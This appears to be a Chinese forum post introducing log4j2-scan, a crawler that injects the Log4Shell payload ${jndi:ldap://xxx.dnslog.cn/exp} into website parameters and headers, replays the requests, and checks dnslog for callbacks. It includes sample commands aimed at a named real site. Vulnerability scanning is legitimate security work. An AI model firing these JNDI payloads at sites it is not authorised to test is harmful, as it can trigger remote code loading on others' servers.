村长 发表于 2022-8-5 00:06:29

【log4j2-scan】使用浏览器爬虫获取网站全链接扫描

log4j2-scan
工具简介
log4j2-scan是一款利用浏览器爬虫爬取网站所有链接,并替换参数值为${jndi:ldap://xxx.dnslog.cn/exp}形式,旨在遍历所有链接发现log4j2漏洞的工具。

工作流程
程序的工作流是利用rad爬取网站所有链接

自动适配操作系统下载rad程序

替换值为log4j2漏洞的payload

更改请求中refer、agent值为payload

更改GET型请求中'='号后的值为payload;

更改POST型请求中data数据包中'=''、':'(json格式)后的值为payload

将替换好的请求进行重放。

如未定义payload, 脚本将自动从dnglog获取并定义未${jndi:ldap://xxx.dnslog.cn/exp}

如果是采用默认的dnslog为接收站点,那么将每重放十次检测一次dnslog。(考虑dnslog请求太多会被封禁)

如自定义接收站点,将不进行检测。

运行参数
需要注意的是,必须安装有chrome才可以运行,不支持firefox等。如chrome不是默认位置,须在rad_config.yml文件中指定chrome路径。

payload值默认自动从dnslog获取,但是因平台问题无法访问时,程序会提示错误。用户可以自定义其他站点或ip,如http://ceye.io/

_                __   _ ____      ____
    | |    ___   __ _| || | (_)___ \    / ___|___ __ _ _ ___ __   ___ _ __
    | |   / _ \ / _` | || |_| | __) |___\___ \ / __/ _` | '_ \| '_ \ / _ \ '__|
    | |__| (_) | (_| |__   _| |/ __/_____|__) | (_| (_| | | | | | | |__/ |
    |_____\___/ \__, ||_|_/ |_____|   |____/ \___\__,_|_| |_|_| |_|\___|_|
                |___/   |__/   by jshahjk@163.com. Illegal use is prohibited.

rad_windows_amd64.exe
usage: scan_with_rad.py [-h] [-u URL] [-f FILE] [-c CHROME_PATH] [-p PAYLOAD]

optional arguments:
-h, --help            show this help message and exit
-u URL, --url URL   Check a single URL.
-f FILE, --file FILEfile containing url.
-c CHROME_PATH      Specify the chrome path.
-p PAYLOAD, --payload PAYLOAD
                        Specify the payload like ${jndi:ldap://xx}.
运行命令:

python scan_with_rad.py -u www.hao24.com
python scan_with_rad.py -p mh7av.ceye.io -u www.xxxx.com
工具地址
https://github.com/zongdeiqianxing/log4j2-scan

68079330 发表于 2022-8-5 21:42:10

传说中的沙发???哇卡卡

neige 发表于 2022-8-6 13:27:24

锄禾日当午,发帖真辛苦。谁知坛中餐,帖帖皆辛苦!

yichong 发表于 2022-8-7 17:06:26

支持楼主,用户楼主,楼主英明呀!!!

liqiang24 发表于 2022-8-10 16:13:36

是爷们的娘们的都帮顶!大力支持
页: [1]
查看完整版本: 【log4j2-scan】使用浏览器爬虫获取网站全链接扫描

村长黑科技是专业提供项目资源的服务的村长黑科技平台,如合购网赚项目、引流推广软件、软件程序开发等项目就选村长黑科
技平台参与或发布项目定制各种软件就来村长黑科技平台

本站中所有被研究的素材与信息全部来源于互联网,版权争议与本站无关。本站所发布的任何软件的破解分析文章、破解分析视频、补丁、注册机和注册信息,

仅限用于学习和研究软件安全的目的。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。学习破解分析技术是为了更好的完善软件可能存在的不安全因素,提升软件安全意识。所以您如果喜欢某程序,

请购买注册正版软件,获得正版优质服务!不允许将上述内容私自传播、销售或者其他任何非法用途!否则,产生任何法律责任,一切后果请用户自负,与本网站无关!如有侵权或非法用途请举报!请发送到邮箱:cxphj8@foxmail.com

《意见反馈》或《截图指定页面备注》发送到邮件,收到后24小时内删除,禁止用户学习使用关掉用户【学习使用权】!